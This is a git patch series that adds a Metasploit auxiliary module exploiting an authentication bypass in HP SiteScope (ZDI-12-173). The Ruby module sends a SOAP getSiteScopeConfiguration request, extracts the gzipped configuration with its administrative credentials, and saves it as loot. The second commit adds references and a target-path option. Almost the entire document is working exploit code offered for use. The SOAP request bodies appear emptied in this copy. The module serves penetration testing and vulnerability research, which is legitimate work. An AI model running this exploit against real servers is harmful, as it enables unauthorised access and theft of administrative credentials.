From 534ab55e5c484644918a2e45ab3b831d0ab6c48f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 5 Sep 2012 12:53:03 +0200 Subject: [PATCH 1/2] Added module for ZDI-12-173 --- .../hp_sitescope_getsitescopeconfiguration.rb | 131 ++++++++++++++++++ 1 file changed, 131 insertions(+) create mode 100644 modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb new file mode 100644 index 0000000000..4465a4a9e8 --- /dev/null +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -0,0 +1,131 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access', + 'Description' => %q{ + This module exploits an authentication bypass vulnerability in HP SiteScope + which allows to retrieve the HP SiteScope configuration, including administrative + credentials. It is accomplished by calling the getSiteScopeConfiguration operation + available through the APISiteScopeImpl AXIS service. The HP SiteScope Configuration + is retrieved as a gzipped file containing Java serialization data. This module has + been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2. + }, + 'References' => + [ + #[ 'OSVDB', '' ], + [ 'BID', '55269' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ] + ], + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(8080), + + ], self.class) + + register_autofilter_ports([ 8080 ]) + deregister_options('RHOST') + end + + def rport + datastore['RPORT'] + end + + def run_host(ip) + res = send_request_cgi({ + 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'method' => 'GET'}) + + if not res + print_error("#{rhost}:#{rport} - Unable to connect") + return + end + + access_configuration + end + + def access_configuration + print_status("#{rhost}:#{rport} - Connecting to SiteScope SOAP Interface") + + data = "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + + res = send_request_cgi({ + 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => data, + 'headers' => { + 'SOAPAction' => '""', + }}) + + if res and res.code == 200 + + if res.headers['Content-Type'] =~ /boundary="(.*)"/ + boundary = $1 + end + if not boundary or boundary.empty? + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + if res.body =~ /getSiteScopeConfigurationReturn href="cid:([A-F0-9]*)"/ + cid = $1 + end + if not cid or cid.empty? + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + if res.body =~ /#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m + loot = Rex::Text.ungzip($1) + end + if not loot or loot.empty? + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") + print_status("#{rhost}:#{rport} - HP SiteScope Configuration saved in #{path}") + print_status("#{rhost}:#{rport} - HP SiteScope Configuration is saved as Java serialization data") + return + end + + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + end + +end + From 20655232d743f0de60b1092bc400340eb4d7d8fb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 5 Sep 2012 20:03:46 +0200 Subject: [PATCH 2/2] cleanup, tested and added osvdb reference --- .../hp_sitescope_getsitescopeconfiguration.rb | 31 ++++++++++++------- 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index 4465a4a9e8..5bb836f8f8 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -26,7 +26,7 @@ class Metasploit4 < Msf::Auxiliary }, 'References' => [ - #[ 'OSVDB', '' ], + [ 'OSVDB', '85120' ], [ 'BID', '55269' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ] ], @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(8080), - + OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']) ], self.class) register_autofilter_ports([ 8080 ]) @@ -53,12 +53,18 @@ class Metasploit4 < Msf::Auxiliary end def run_host(ip) + @peer = "#{rhost}:#{rport}" + @uri = target_uri.path + @uri << '/' if @uri[-1,1] != '/' + + print_status("#{@peer} - Connecting to SiteScope SOAP Interface") + res = send_request_cgi({ - 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'GET'}) if not res - print_error("#{rhost}:#{rport} - Unable to connect") + print_error("#{@peer} - Unable to connect") return end @@ -66,7 +72,6 @@ class Metasploit4 < Msf::Auxiliary end def access_configuration - print_status("#{rhost}:#{rport} - Connecting to SiteScope SOAP Interface") data = "" + "\r\n" data << "" + "\r\n" data << "" + print_status("#{@peer} - Retrieving the SiteScope Configuration") + res = send_request_cgi({ - 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, @@ -98,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") return end @@ -106,7 +113,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") return end @@ -114,17 +121,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") return end path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") - print_status("#{rhost}:#{rport} - HP SiteScope Configuration saved in #{path}") - print_status("#{rhost}:#{rport} - HP SiteScope Configuration is saved as Java serialization data") + print_status("#{@peer} - HP SiteScope Configuration saved in #{path}") + print_status("#{@peer} - HP SiteScope Configuration is saved as Java serialization data") return end - print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") end end